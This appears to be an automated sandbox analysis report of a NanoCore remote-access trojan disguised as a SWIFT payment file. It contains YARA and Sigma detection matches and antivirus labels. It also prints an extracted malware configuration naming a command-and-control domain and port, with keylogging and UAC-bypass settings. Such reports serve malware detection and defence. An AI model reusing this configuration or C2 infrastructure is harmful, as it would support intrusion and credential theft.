3.2.fdqkbs.exe.6240e0.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
3.2.fdqkbs.exe.6240e0.2.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe38d:$a1: NanoCore.ClientPluginHost 0xe34d:$a2: NanoCore.ClientPlugin 0x102a6:$b1: get_BuilderSettings 0xe1a9:$b2: ClientLoaderForm.resources 0xf9c6:$b3: PluginCommand 0xe37e:$b4: IClientAppHost 0x187fe:$b5: GetBlockHash 0x108fe:$b6: AddHostEntry 0x145f1:$b7: LogClientException 0x1086b:$b8: PipeExists 0xe3b7:$b9: IClientLoggingHost
3.2.fdqkbs.exe.34e5530.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.fdqkbs.exe.34e5530.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
3.2.fdqkbs.exe.34e5530.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.34e5530.6.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
3.2.fdqkbs.exe.34e5530.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
3.2.fdqkbs.exe.34e5530.6.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe38d:$a1: NanoCore.ClientPluginHost 0xe34d:$a2: NanoCore.ClientPlugin 0x102a6:$b1: get_BuilderSettings 0xe1a9:$b2: ClientLoaderForm.resources 0xf9c6:$b3: PluginCommand 0xe37e:$b4: IClientAppHost 0x187fe:$b5: GetBlockHash 0x108fe:$b6: AddHostEntry 0x145f1:$b7: LogClientException 0x1086b:$b8: PipeExists 0xe3b7:$b9: IClientLoggingHost
3.2.fdqkbs.exe.355e3ae.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5e7:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d614:$x2: IClientNetworkHost
3.2.fdqkbs.exe.355e3ae.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d5e7:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e6c2:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d601:$s5: IClientLoggingHost
3.2.fdqkbs.exe.355e3ae.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.355e3ae.5.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0x145ae:$x2: NanoCore.ClientPlugin 0x2d5b2:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0x145e3:$x3: NanoCore.ClientPluginHost 0x2d5e7:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0x145a2:$i2: IClientData 0x2d5a6:$i2: IClientData 0xe29:$i3: IClientNetwork 0x145c4:$i3: IClientNetwork 0x2d5c8:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0x145d3:$i5: IClientDataHost 0x2d5d7:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0x145fd:$i6: IClientLoggingHost 0x2d601:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost
3.2.fdqkbs.exe.355e3ae.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d59d:$a: NanoCore 0x2d5b2:$a: NanoCore 0x2d5e7:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d359:$b: ClientPlugin 0x2d374:$b: ClientPlugin
3.2.fdqkbs.exe.355e3ae.5.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0x145e3:$a1: NanoCore.ClientPluginHost 0x2d5e7:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x145ae:$a2: NanoCore.ClientPlugin 0x2d5b2:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0x19529:$b1: get_BuilderSettings 0x3252d:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x19498:$b7: LogClientException 0x3249c:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost 0x145fd:$b9: IClientLoggingHost 0x2d601:$b9: IClientLoggingHost
Click to see the 80 entries

Sigma Signatures

AV Detection

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fdqkbs.exe, ProcessId: 5336, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud

Sigma detected: NanoCore

Source: File created

Stealing of Sensitive Information

Sigma detected: NanoCore

Source: File created

Remote Access Functionality

Sigma detected: NanoCore

Source: File created

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SWIFT MO104978172_1301 EURO 9700.js

ReversingLabs: Detection: 46%

Antivirus / Scanner detection for submitted sample

Source: SWIFT MO104978172_1301 EURO 9700.js

Avira: detected

Antivirus detection for URL or domain

Source: bition.duckdns.org

Avira URL Cloud: Label: malware

Yara detected Nanocore RAT

Source: Yara match	File source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe

Joe Sandbox ML: detected

Source: 3.2.fdqkbs.exe.400000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 0.3.wscript.exe.2c17141e8b0.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.2.fdqkbs.exe.4910000.9.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 0.2.wscript.exe.2c1743a0090.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "82fe3011-00e2-4a52-9361-cad1a21d", "Group": "bition1", "Domain1": "bition.duckdns.org", "Domain2": "bition.duckdns.org", "Port": 8817, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "bition.duckdns.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Unpacked PE file: 3.2.fdqkbs.exe.4910000.9.unpack

Source:	Binary string: C:\xampp\htdocs\ab320849c3d04f77b5cc7477929d7dcb\Loader\Release\Loader.pdb source: SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmp, SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000002.275512291.000000000283E000.00000004.00000020.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000002.270678669.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000002.00000000.257316994.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000003.00000000.260606717.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000008.00000000.278941376.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000008.00000002.297962991.0000000000410000.00000002.00000001.01000000.00000007.sdmp, syhbwgs.exe, 0000000B.00000002.298205955.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, syhbwgs.exe, 0000000B.00000000.286300116.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, syhbwgs.exe, 00000015.00000002.314785679.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, syhbwgs.exe, 00000015.00000000.308154727.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, fdqkbs.exe.1.dr, nse2F03.tmp.1.dr, syhbwgs.exe.2.dr
Source:	Binary string: wntdll.pdbUGP source: fdqkbs.exe, 00000002.00000003.265726648.000000001A460000.00000004.00001000.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000003.262758217.000000001A5F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: fdqkbs.exe, 00000002.00000003.265726648.000000001A460000.00000004.00001000.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000003.262758217.000000001A5F0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405D74
Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	Code function: 1_2_0040699E FindFirstFileW,FindClose,	1_2_0040699E
Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	Code function: 1_2_0040290B FindFirstFileW,	1_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_00406715 FindFirstFileExW,	3_2_00406715

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: bition.duckdns.org

Source: wscript.exe, 00000000.00000003.255882496.000002C17141E000.00000004.00000020.00020000.00000000.sdmp, SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmp, SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000000.255759037.000000000040A000.00000008.00000001.01000000.00000006.sdmp, SWIFT MO104978172_1301 EURO 9700.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: fdqkbs.exe, 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.12.dr	String found in binary or memory: http://upx.sf.net

Source: syhbwgs.exe, 0000000B.00000002.298260544.00000000007BA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: fdqkbs.exe, 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe

Code function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_00405809

E-Banking Fraud

Yara detected Nanocore RAT

Source: Yara match	File source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
